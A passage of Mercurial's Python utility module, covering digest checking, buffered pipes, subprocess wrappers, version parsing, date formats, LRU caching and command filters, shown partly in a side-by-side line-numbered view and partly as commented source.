217 'sha512': hashlib.sha512,
218 }
218 }
219 # List of digest types from strongest to weakest
219 # List of digest types from strongest to weakest
220 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
220 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
221
221
222 for k in DIGESTS_BY_STRENGTH:
222 for k in DIGESTS_BY_STRENGTH:
223 assert k in DIGESTS
223 assert k in DIGESTS
224
224
225 class digester(object):
225 class digester(object):
226 """helper to compute digests.
226 """helper to compute digests.
227
227
228 This helper can be used to compute one or more digests given their name.
228 This helper can be used to compute one or more digests given their name.
229
229
230 >>> d = digester([b'md5', b'sha1'])
230 >>> d = digester([b'md5', b'sha1'])
231 >>> d.update(b'foo')
231 >>> d.update(b'foo')
232 >>> [k for k in sorted(d)]
232 >>> [k for k in sorted(d)]
233 ['md5', 'sha1']
233 ['md5', 'sha1']
234 >>> d[b'md5']
234 >>> d[b'md5']
235 'acbd18db4cc2f85cedef654fccc4a4d8'
235 'acbd18db4cc2f85cedef654fccc4a4d8'
236 >>> d[b'sha1']
236 >>> d[b'sha1']
237 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
237 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
238 >>> digester.preferred([b'md5', b'sha1'])
238 >>> digester.preferred([b'md5', b'sha1'])
239 'sha1'
239 'sha1'
240 """
240 """
241
241
242 def __init__(self, digests, s=''):
242 def __init__(self, digests, s=''):
243 self._hashes = {}
243 self._hashes = {}
244 for k in digests:
244 for k in digests:
245 if k not in DIGESTS:
245 if k not in DIGESTS:
246 raise Abort(_('unknown digest type: %s') % k)
246 raise Abort(_('unknown digest type: %s') % k)
247 self._hashes[k] = DIGESTS[k]()
247 self._hashes[k] = DIGESTS[k]()
248 if s:
248 if s:
249 self.update(s)
249 self.update(s)
250
250
251 def update(self, data):
251 def update(self, data):
252 for h in self._hashes.values():
252 for h in self._hashes.values():
253 h.update(data)
253 h.update(data)
254
254
255 def __getitem__(self, key):
255 def __getitem__(self, key):
256 if key not in DIGESTS:
256 if key not in DIGESTS:
257 raise Abort(_('unknown digest type: %s') % k)
257 raise Abort(_('unknown digest type: %s') % k)
258 return self._hashes[key].hexdigest()
258 return self._hashes[key].hexdigest()
259
259
260 def __iter__(self):
260 def __iter__(self):
261 return iter(self._hashes)
261 return iter(self._hashes)
262
262
263 @staticmethod
263 @staticmethod
264 def preferred(supported):
264 def preferred(supported):
265 """returns the strongest digest type in both supported and DIGESTS."""
265 """returns the strongest digest type in both supported and DIGESTS."""
266
266
267 for k in DIGESTS_BY_STRENGTH:
267 for k in DIGESTS_BY_STRENGTH:
268 if k in supported:
268 if k in supported:
269 return k
269 return k
270 return None
270 return None
271
271
272 class digestchecker(object):
272 class digestchecker(object):
273 """file handle wrapper that additionally checks content against a given
273 """file handle wrapper that additionally checks content against a given
274 size and digests.
274 size and digests.
275
275
276 d = digestchecker(fh, size, {'md5': '...'})
276 d = digestchecker(fh, size, {'md5': '...'})
277
277
278 When multiple digests are given, all of them are validated.
278 When multiple digests are given, all of them are validated.
279 """
279 """
280
280
281 def __init__(self, fh, size, digests):
281 def __init__(self, fh, size, digests):
282 self._fh = fh
282 self._fh = fh
283 self._size = size
283 self._size = size
284 self._got = 0
284 self._got = 0
285 self._digests = dict(digests)
285 self._digests = dict(digests)
286 self._digester = digester(self._digests.keys())
286 self._digester = digester(self._digests.keys())
287
287
288 def read(self, length=-1):
288 def read(self, length=-1):
289 content = self._fh.read(length)
289 content = self._fh.read(length)
290 self._digester.update(content)
290 self._digester.update(content)
291 self._got += len(content)
291 self._got += len(content)
292 return content
292 return content
293
293
294 def validate(self):
294 def validate(self):
295 if self._size != self._got:
295 if self._size != self._got:
296 raise Abort(_('size mismatch: expected %d, got %d') %
296 raise Abort(_('size mismatch: expected %d, got %d') %
297 (self._size, self._got))
297 (self._size, self._got))
298 for k, v in self._digests.items():
298 for k, v in self._digests.items():
299 if v != self._digester[k]:
299 if v != self._digester[k]:
300 # i18n: first parameter is a digest name
300 # i18n: first parameter is a digest name
301 raise Abort(_('%s mismatch: expected %s, got %s') %
301 raise Abort(_('%s mismatch: expected %s, got %s') %
302 (k, v, self._digester[k]))
302 (k, v, self._digester[k]))
303
303
304 try:
304 try:
305 buffer = buffer
305 buffer = buffer
306 except NameError:
306 except NameError:
307 def buffer(sliceable, offset=0, length=None):
307 def buffer(sliceable, offset=0, length=None):
308 if length is not None:
308 if length is not None:
309 return memoryview(sliceable)[offset:offset + length]
309 return memoryview(sliceable)[offset:offset + length]
310 return memoryview(sliceable)[offset:]
310 return memoryview(sliceable)[offset:]
311
311
312 closefds = pycompat.osname == 'posix'
312 closefds = pycompat.osname == 'posix'
313
313
314 _chunksize = 4096
314 _chunksize = 4096
315
315
316 class bufferedinputpipe(object):
316 class bufferedinputpipe(object):
317 """a manually buffered input pipe
317 """a manually buffered input pipe
318
318
319 Python will not let us use buffered IO and lazy reading with 'polling' at
319 Python will not let us use buffered IO and lazy reading with 'polling' at
320 the same time. We cannot probe the buffer state and select will not detect
320 the same time. We cannot probe the buffer state and select will not detect
321 that data are ready to read if they are already buffered.
321 that data are ready to read if they are already buffered.
322
322
323 This class let us work around that by implementing its own buffering
323 This class let us work around that by implementing its own buffering
324 (allowing efficient readline) while offering a way to know if the buffer is
324 (allowing efficient readline) while offering a way to know if the buffer is
325 empty from the output (allowing collaboration of the buffer with polling).
325 empty from the output (allowing collaboration of the buffer with polling).
326
326
327 This class lives in the 'util' module because it makes use of the 'os'
327 This class lives in the 'util' module because it makes use of the 'os'
328 module from the python stdlib.
328 module from the python stdlib.
329 """
329 """
330
330
331 def __init__(self, input):
331 def __init__(self, input):
332 self._input = input
332 self._input = input
333 self._buffer = []
333 self._buffer = []
334 self._eof = False
334 self._eof = False
335 self._lenbuf = 0
335 self._lenbuf = 0
336
336
337 @property
337 @property
338 def hasbuffer(self):
338 def hasbuffer(self):
339 """True is any data is currently buffered
339 """True is any data is currently buffered
340
340
341 This will be used externally a pre-step for polling IO. If there is
341 This will be used externally a pre-step for polling IO. If there is
342 already data then no polling should be set in place."""
342 already data then no polling should be set in place."""
343 return bool(self._buffer)
343 return bool(self._buffer)
344
344
345 @property
345 @property
346 def closed(self):
346 def closed(self):
347 return self._input.closed
347 return self._input.closed
348
348
349 def fileno(self):
349 def fileno(self):
350 return self._input.fileno()
350 return self._input.fileno()
351
351
352 def close(self):
352 def close(self):
353 return self._input.close()
353 return self._input.close()
354
354
355 def read(self, size):
355 def read(self, size):
356 while (not self._eof) and (self._lenbuf < size):
356 while (not self._eof) and (self._lenbuf < size):
357 self._fillbuffer()
357 self._fillbuffer()
358 return self._frombuffer(size)
358 return self._frombuffer(size)
359
359
360 def readline(self, *args, **kwargs):
360 def readline(self, *args, **kwargs):
361 if 1 < len(self._buffer):
361 if 1 < len(self._buffer):
362 # this should not happen because both read and readline end with a
362 # this should not happen because both read and readline end with a
363 # _frombuffer call that collapse it.
363 # _frombuffer call that collapse it.
364 self._buffer = [''.join(self._buffer)]
364 self._buffer = [''.join(self._buffer)]
365 self._lenbuf = len(self._buffer[0])
365 self._lenbuf = len(self._buffer[0])
366 lfi = -1
366 lfi = -1
367 if self._buffer:
367 if self._buffer:
368 lfi = self._buffer[-1].find('\n')
368 lfi = self._buffer[-1].find('\n')
369 while (not self._eof) and lfi < 0:
369 while (not self._eof) and lfi < 0:
370 self._fillbuffer()
370 self._fillbuffer()
371 if self._buffer:
371 if self._buffer:
372 lfi = self._buffer[-1].find('\n')
372 lfi = self._buffer[-1].find('\n')
373 size = lfi + 1
373 size = lfi + 1
374 if lfi < 0: # end of file
374 if lfi < 0: # end of file
375 size = self._lenbuf
375 size = self._lenbuf
376 elif 1 < len(self._buffer):
376 elif 1 < len(self._buffer):
377 # we need to take previous chunks into account
377 # we need to take previous chunks into account
378 size += self._lenbuf - len(self._buffer[-1])
378 size += self._lenbuf - len(self._buffer[-1])
379 return self._frombuffer(size)
379 return self._frombuffer(size)
380
380
381 def _frombuffer(self, size):
381 def _frombuffer(self, size):
382 """return at most 'size' data from the buffer
382 """return at most 'size' data from the buffer
383
383
384 The data are removed from the buffer."""
384 The data are removed from the buffer."""
385 if size == 0 or not self._buffer:
385 if size == 0 or not self._buffer:
386 return ''
386 return ''
387 buf = self._buffer[0]
387 buf = self._buffer[0]
388 if 1 < len(self._buffer):
388 if 1 < len(self._buffer):
389 buf = ''.join(self._buffer)
389 buf = ''.join(self._buffer)
390
390
391 data = buf[:size]
391 data = buf[:size]
392 buf = buf[len(data):]
392 buf = buf[len(data):]
393 if buf:
393 if buf:
394 self._buffer = [buf]
394 self._buffer = [buf]
395 self._lenbuf = len(buf)
395 self._lenbuf = len(buf)
396 else:
396 else:
397 self._buffer = []
397 self._buffer = []
398 self._lenbuf = 0
398 self._lenbuf = 0
399 return data
399 return data
400
400
401 def _fillbuffer(self):
401 def _fillbuffer(self):
402 """read data to the buffer"""
402 """read data to the buffer"""
403 data = os.read(self._input.fileno(), _chunksize)
403 data = os.read(self._input.fileno(), _chunksize)
404 if not data:
404 if not data:
405 self._eof = True
405 self._eof = True
406 else:
406 else:
407 self._lenbuf += len(data)
407 self._lenbuf += len(data)
408 self._buffer.append(data)
408 self._buffer.append(data)
409
409
410 def popen2(cmd, env=None, newlines=False):
410 def popen2(cmd, env=None, newlines=False):
411 # Setting bufsize to -1 lets the system decide the buffer size.
411 # Setting bufsize to -1 lets the system decide the buffer size.
412 # The default for bufsize is 0, meaning unbuffered. This leads to
412 # The default for bufsize is 0, meaning unbuffered. This leads to
413 # poor performance on Mac OS X: http://bugs.python.org/issue4194
413 # poor performance on Mac OS X: http://bugs.python.org/issue4194
414 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
414 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
415 close_fds=closefds,
415 close_fds=closefds,
416 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
416 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
417 universal_newlines=newlines,
417 universal_newlines=newlines,
418 env=env)
418 env=env)
419 return p.stdin, p.stdout
419 return p.stdin, p.stdout
420
420
421 def popen3(cmd, env=None, newlines=False):
421 def popen3(cmd, env=None, newlines=False):
422 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
422 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
423 return stdin, stdout, stderr
423 return stdin, stdout, stderr
424
424
425 def popen4(cmd, env=None, newlines=False, bufsize=-1):
425 def popen4(cmd, env=None, newlines=False, bufsize=-1):
426 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
426 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
427 close_fds=closefds,
427 close_fds=closefds,
428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
429 stderr=subprocess.PIPE,
429 stderr=subprocess.PIPE,
430 universal_newlines=newlines,
430 universal_newlines=newlines,
431 env=env)
431 env=env)
432 return p.stdin, p.stdout, p.stderr, p
432 return p.stdin, p.stdout, p.stderr, p
433
433
434 def version():
434 def version():
435 """Return version information if available."""
435 """Return version information if available."""
436 try:
436 try:
437 from . import __version__
437 from . import __version__
438 return __version__.version
438 return __version__.version
439 except ImportError:
439 except ImportError:
440 return 'unknown'
440 return 'unknown'
441
441
442 def versiontuple(v=None, n=4):
442 def versiontuple(v=None, n=4):
443 """Parses a Mercurial version string into an N-tuple.
443 """Parses a Mercurial version string into an N-tuple.
444
444
445 The version string to be parsed is specified with the ``v`` argument.
445 The version string to be parsed is specified with the ``v`` argument.
446 If it isn't defined, the current Mercurial version string will be parsed.
446 If it isn't defined, the current Mercurial version string will be parsed.
447
447
448 ``n`` can be 2, 3, or 4. Here is how some version strings map to
448 ``n`` can be 2, 3, or 4. Here is how some version strings map to
449 returned values:
449 returned values:
450
450
451 >>> v = b'3.6.1+190-df9b73d2d444'
451 >>> v = b'3.6.1+190-df9b73d2d444'
452 >>> versiontuple(v, 2)
452 >>> versiontuple(v, 2)
453 (3, 6)
453 (3, 6)
454 >>> versiontuple(v, 3)
454 >>> versiontuple(v, 3)
455 (3, 6, 1)
455 (3, 6, 1)
456 >>> versiontuple(v, 4)
456 >>> versiontuple(v, 4)
457 (3, 6, 1, '190-df9b73d2d444')
457 (3, 6, 1, '190-df9b73d2d444')
458
458
459 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
459 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
460 (3, 6, 1, '190-df9b73d2d444+20151118')
460 (3, 6, 1, '190-df9b73d2d444+20151118')
461
461
462 >>> v = b'3.6'
462 >>> v = b'3.6'
463 >>> versiontuple(v, 2)
463 >>> versiontuple(v, 2)
464 (3, 6)
464 (3, 6)
465 >>> versiontuple(v, 3)
465 >>> versiontuple(v, 3)
466 (3, 6, None)
466 (3, 6, None)
467 >>> versiontuple(v, 4)
467 >>> versiontuple(v, 4)
468 (3, 6, None, None)
468 (3, 6, None, None)
469
469
470 >>> v = b'3.9-rc'
470 >>> v = b'3.9-rc'
471 >>> versiontuple(v, 2)
471 >>> versiontuple(v, 2)
472 (3, 9)
472 (3, 9)
473 >>> versiontuple(v, 3)
473 >>> versiontuple(v, 3)
474 (3, 9, None)
474 (3, 9, None)
475 >>> versiontuple(v, 4)
475 >>> versiontuple(v, 4)
476 (3, 9, None, 'rc')
476 (3, 9, None, 'rc')
477
477
478 >>> v = b'3.9-rc+2-02a8fea4289b'
478 >>> v = b'3.9-rc+2-02a8fea4289b'
479 >>> versiontuple(v, 2)
479 >>> versiontuple(v, 2)
480 (3, 9)
480 (3, 9)
481 >>> versiontuple(v, 3)
481 >>> versiontuple(v, 3)
482 (3, 9, None)
482 (3, 9, None)
483 >>> versiontuple(v, 4)
483 >>> versiontuple(v, 4)
484 (3, 9, None, 'rc+2-02a8fea4289b')
484 (3, 9, None, 'rc+2-02a8fea4289b')
485 """
485 """
486 if not v:
486 if not v:
487 v = version()
487 v = version()
488 parts = remod.split('[\+-]', v, 1)
488 parts = remod.split('[\+-]', v, 1)
489 if len(parts) == 1:
489 if len(parts) == 1:
490 vparts, extra = parts[0], None
490 vparts, extra = parts[0], None
491 else:
491 else:
492 vparts, extra = parts
492 vparts, extra = parts
493
493
494 vints = []
494 vints = []
495 for i in vparts.split('.'):
495 for i in vparts.split('.'):
496 try:
496 try:
497 vints.append(int(i))
497 vints.append(int(i))
498 except ValueError:
498 except ValueError:
499 break
499 break
500 # (3, 6) -> (3, 6, None)
500 # (3, 6) -> (3, 6, None)
501 while len(vints) < 3:
501 while len(vints) < 3:
502 vints.append(None)
502 vints.append(None)
503
503
504 if n == 2:
504 if n == 2:
505 return (vints[0], vints[1])
505 return (vints[0], vints[1])
506 if n == 3:
506 if n == 3:
507 return (vints[0], vints[1], vints[2])
507 return (vints[0], vints[1], vints[2])
508 if n == 4:
508 if n == 4:
509 return (vints[0], vints[1], vints[2], extra)
509 return (vints[0], vints[1], vints[2], extra)
510
510
511 # used by parsedate
511 # used by parsedate
512 defaultdateformats = (
512 defaultdateformats = (
513 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
513 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
514 '%Y-%m-%dT%H:%M', # without seconds
514 '%Y-%m-%dT%H:%M', # without seconds
515 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
515 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
516 '%Y-%m-%dT%H%M', # without seconds
516 '%Y-%m-%dT%H%M', # without seconds
517 '%Y-%m-%d %H:%M:%S', # our common legal variant
517 '%Y-%m-%d %H:%M:%S', # our common legal variant
518 '%Y-%m-%d %H:%M', # without seconds
518 '%Y-%m-%d %H:%M', # without seconds
519 '%Y-%m-%d %H%M%S', # without :
519 '%Y-%m-%d %H%M%S', # without :
520 '%Y-%m-%d %H%M', # without seconds
520 '%Y-%m-%d %H%M', # without seconds
521 '%Y-%m-%d %I:%M:%S%p',
521 '%Y-%m-%d %I:%M:%S%p',
522 '%Y-%m-%d %H:%M',
522 '%Y-%m-%d %H:%M',
523 '%Y-%m-%d %I:%M%p',
523 '%Y-%m-%d %I:%M%p',
524 '%Y-%m-%d',
524 '%Y-%m-%d',
525 '%m-%d',
525 '%m-%d',
526 '%m/%d',
526 '%m/%d',
527 '%m/%d/%y',
527 '%m/%d/%y',
528 '%m/%d/%Y',
528 '%m/%d/%Y',
529 '%a %b %d %H:%M:%S %Y',
529 '%a %b %d %H:%M:%S %Y',
530 '%a %b %d %I:%M:%S%p %Y',
530 '%a %b %d %I:%M:%S%p %Y',
531 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
531 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
532 '%b %d %H:%M:%S %Y',
532 '%b %d %H:%M:%S %Y',
533 '%b %d %I:%M:%S%p %Y',
533 '%b %d %I:%M:%S%p %Y',
534 '%b %d %H:%M:%S',
534 '%b %d %H:%M:%S',
535 '%b %d %I:%M:%S%p',
535 '%b %d %I:%M:%S%p',
536 '%b %d %H:%M',
536 '%b %d %H:%M',
537 '%b %d %I:%M%p',
537 '%b %d %I:%M%p',
538 '%b %d %Y',
538 '%b %d %Y',
539 '%b %d',
539 '%b %d',
540 '%H:%M:%S',
540 '%H:%M:%S',
541 '%I:%M:%S%p',
541 '%I:%M:%S%p',
542 '%H:%M',
542 '%H:%M',
543 '%I:%M%p',
543 '%I:%M%p',
544 )
544 )
545
545
546 extendeddateformats = defaultdateformats + (
546 extendeddateformats = defaultdateformats + (
547 "%Y",
547 "%Y",
548 "%Y-%m",
548 "%Y-%m",
549 "%b",
549 "%b",
550 "%b %Y",
550 "%b %Y",
551 )
551 )
552
552
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # Zero-argument case: a one-slot list serves both as the
        # "computed yet?" flag and as storage for the single result.
        slot = []
        def f():
            if not slot:
                slot.append(func())
            return slot[0]
        return f
    memo = {}
    if argcount == 1:
        # Single-argument fast path: avoids packing/unpacking a tuple.
        def f(arg):
            try:
                return memo[arg]
            except KeyError:
                memo[arg] = func(arg)
                return memo[arg]
    else:
        def f(*args):
            try:
                return memo[args]
            except KeyError:
                memo[args] = func(*args)
                return memo[args]

    return f
578
578
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Re-setting an existing key moves it to the end, giving
        # "last-set" iteration order (plain OrderedDict keeps the
        # original insertion position on overwrite).
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        # Route update() through our __setitem__ so the last-set
        # ordering is preserved on PyPy too.
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
603
603
class transactional(object):
    """Mixin that turns a transaction-like object into a context manager.

    Subclasses provide close() and release(); the with-statement then
    commits on a clean exit and always releases afterwards.
    """
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, exctb):
        try:
            # Commit only if the body finished without raising.
            if exctype is None:
                self.close()
        finally:
            # Release unconditionally, even if close() raised.
            self.release()
628
628
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # An intervention request is not a failure: commit what was done
        # so far before letting the exception propagate.
        tr.close()
        raise
    finally:
        # Released in every case; aborts the transaction if close() was
        # never reached (see transactional.release()'s contract).
        tr.release()
646
646
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing on entry or exit."""
    yield
650
650
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        # A fresh node is detached (no neighbors) and holds no entry;
        # the _notset sentinel distinguishes "empty" from key=None.
        self.next = self.prev = None
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
669
669
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        # key -> _lrucachenode, for O(1) lookup
        self._cache = {}

        # the circular list starts out as one empty node linked to itself
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        # a successful lookup refreshes the entry (marks it most recent)
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        """Return the value for ``k`` or ``default`` on a miss.

        Unlike __getitem__, this does not refresh the entry's recency.
        """
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        """Drop all entries, marking every list node as unused."""
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        """Return a new lrucachedict with the same entries and ordering."""
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
828
828
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg in cache:
                # cache hit: just refresh recency (move key to MRU end)
                order.remove(arg)
            else:
                # cache miss: evict the least-recently-used key once the
                # cache holds more than 20 entries, then compute
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args in cache:
                order.remove(args)
            else:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            order.append(args)
            return cache[args]

    return f
855
855
class propertycache(object):
    """Non-data descriptor caching the wrapped function's result.

    The first attribute access computes the value and stores it in the
    instance __dict__ under the same name, so later accesses bypass the
    descriptor entirely.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
868
868
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    stdoutdata, _stderrdata = proc.communicate(s)
    # stderr is not captured (no pipe), so _stderrdata is always None
    return stdoutdata
875
875
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        # write the input into a temp file the command can read
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        # reserve a second temp file for the command's output
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            # on OpenVMS a set low status bit is treated as success here
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort cleanup of both temporary files
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
909
909
# maps a filter-spec prefix to the implementation that runs it; specs
# with no recognized prefix fall back to pipefilter (see filter())
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
    }
914
914
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # dispatch on a recognized spec prefix; default to a plain pipe
    for prefix, fn in filtertable.iteritems():
        if not cmd.startswith(prefix):
            continue
        return fn(s, cmd[len(prefix):].lstrip())
    return pipefilter(s, cmd)
921
921
def binary(s):
    """return true if a string is binary data"""
    # empty/None input is never considered binary; otherwise the
    # presence of a NUL byte is the heuristic
    if not s:
        return False
    return '\0' in s
925
925
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        # floor(log2(x)) for positive x; defined as 0 for x == 0
        if not x:
            return 0
        return x.bit_length() - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                # grow the threshold: double it, or jump straight to
                # the size class of what we just buffered, capped at max
                min <<= 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)
956
956
# alias so code in this module (and its callers) can use Abort directly;
# error.Abort is the canonical definition
Abort = error.Abort
958
958
def always(fn):
    """Predicate returning True for any argument (the argument is ignored)."""
    return True
961
961
def never(fn):
    """Predicate returning False for any argument (the argument is ignored)."""
    return False
964
964
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # re-enable only if we were the ones who turned it off
            if wasenabled:
                gc.enable()
    return wrapper
987
987
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    # make nogc an identity decorator (no-op) on that interpreter
    nogc = lambda x: x
991
991
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives (Windows): no relative path exists, so
            # return the absolute destination instead
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # strip the common leading components of both paths
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # climb out of what remains of n1, then descend into n2
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1017
1017
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    # NOTE(review): safehasattr is a sibling helper -- presumably a
    # non-swallowing hasattr; confirm against its definition elsewhere
